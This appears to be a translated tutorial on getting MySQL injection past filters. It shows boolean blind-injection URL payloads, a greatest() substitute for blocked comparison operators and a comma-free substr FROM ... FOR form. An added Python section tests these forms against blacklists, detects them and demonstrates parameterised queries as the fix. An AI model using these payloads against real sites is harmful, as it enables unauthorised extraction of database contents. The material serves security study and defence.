Filter bypass techniques for MySQL injections

Source: Internet
Author: User

There are many bypass techniques for SQL injection; this article only gives a few simple summaries.

The ideal injection point:

Supports union queries

Can produce error messages

Supports extras such as multi-statement execution, executing system commands, HTTP requests, etc.

If none of this is available, brute-force guessing may be required. When guessing, you may run into some restrictions, and the attacker's job is to get around them.

1. Use the greatest function to bypass the case where comparison operators cannot be used

When you are guessing a single character, you typically use binary search to find it:

mysql> select ascii(mid(user(),1,1)) < 150;
+------------------------------+
| ascii(mid(user(),1,1)) < 150 |
+------------------------------+
|                            1 |
+------------------------------+

The above determines whether the ASCII code of the first character of user() is less than 150. It returns true (1) if it is less than 150, otherwise false (0). You can see that this needs the comparison operators.

For example, for a boolean-based injection, try:

http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) < 150

http://xxx.com/index.php?id=1 and ascii(mid(user(),1,1)) >= 150

The content returned by the two pages above should be different.

But the problem is that in some cases the comparison operators (< and >) are filtered and cannot be used.

At this point you can use the greatest function to bypass the filter. greatest(a, b) returns the larger of a and b.

When we want to guess whether the ASCII code of the first character of user() is less than or equal to 150, use:

mysql> select greatest(ascii(mid(user(),1,1)),150)=150;
+------------------------------------------+
| greatest(ascii(mid(user(),1,1)),150)=150 |
+------------------------------------------+
|                                        1 |
+------------------------------------------+

If the ASCII code is less than or equal to 150, the expression above returns true (1); otherwise greatest() returns the larger character code and the comparison is false (0).

2. Use the substr function to bypass the case where commas cannot be used

Cases where commas cannot be used are rarer; it usually happens because the comma has some special meaning to the application and is handled separately.

Usually the guess uses a comma, because the arguments of the mid function are separated by commas:

ascii(mid(user(),1,1))=150

The way to bypass this is the from X for Y syntax:

mid(user() from 1 for 1)

or

substr(user() from 1 for 1)

Both of the above also start at the first character and take one character.

Then the injection syntax without a comma becomes:

mysql> select ascii(substr(user() from 1 for 1)) < 150;
+------------------------------------------+
| ascii(substr(user() from 1 for 1)) < 150 |
+------------------------------------------+
|                                        1 |
+------------------------------------------+

The result is the same as with the comma form of the mid function, but no comma is used.
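The lesson of both sections above for the defender is that character blacklists (rejecting < and >, or rejecting commas) do not stop boolean-based guessing; the following added example (not part of the original article) shows the two blacklist styles, checks the page's own payload shapes against them, adds a simple detection check for the greatest() and FROM ... FOR forms, and contrasts this with a parameterised query. The sqlite3 module stands in for MySQL; the table, the payload strings and the regular expressions are constructed for this example.

```python
import re
import sqlite3

# The two blacklist styles the page describes: one rejects comparison
# operators, the other rejects commas in the user-supplied value.
FILTER_NO_COMPARISON = re.compile(r"[<>]")
FILTER_NO_COMMA = re.compile(r",")

# Payload shapes taken from the page (guessing one character of user()).
PLAIN = "1 and ascii(mid(user(),1,1)) < 150"
GREATEST_FORM = "1 and greatest(ascii(mid(user(),1,1)),150)=150"  # no < or >
FROM_FOR_FORM = "1 and ascii(substr(user() from 1 for 1)) < 150"  # no comma

def is_blocked(blacklist, value):
    """True if the character blacklist would reject the request value."""
    return blacklist.search(value) is not None

def detect_bypass_shapes(value):
    """Defensive check: flag the function-call shapes the page uses to
    avoid the blacklisted characters. Keyword matching, not a SQL parser."""
    findings = []
    if re.search(r"\bgreatest\s*\(", value, re.I):
        findings.append("greatest() in place of a comparison operator")
    if re.search(r"\b(substr|substring|mid)\s*\(.*?\bfrom\b", value, re.I):
        findings.append("comma-free substr/mid FROM ... FOR form")
    return findings

def lookup_parameterised(conn, id_value):
    """Mitigation: bind the value, so a payload is compared as literal text
    instead of being parsed as SQL (sqlite3 stands in for MySQL here)."""
    return conn.execute("SELECT name FROM items WHERE id = ?",
                        (id_value,)).fetchall()

def demo():
    conn = sqlite3.connect(":memory:")  # constructed sample table
    conn.execute("CREATE TABLE items (id TEXT, name TEXT)")
    conn.execute("INSERT INTO items VALUES ('1', 'first')")
    return {
        "plain_blocked": is_blocked(FILTER_NO_COMPARISON, PLAIN)
        and is_blocked(FILTER_NO_COMMA, PLAIN),
        "greatest_passes": not is_blocked(FILTER_NO_COMPARISON, GREATEST_FORM),
        "from_for_passes": not is_blocked(FILTER_NO_COMMA, FROM_FOR_FORM),
        "flagged": [detect_bypass_shapes(p) for p in (GREATEST_FORM, FROM_FOR_FORM)],
        "rows_for_payload": lookup_parameterised(conn, PLAIN),
        "rows_for_legit_id": lookup_parameterised(conn, "1"),
    }
```

Each blacklist stops the plain payload but passes the rewritten form from the matching section, while the bound parameter returns no row for any of them.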
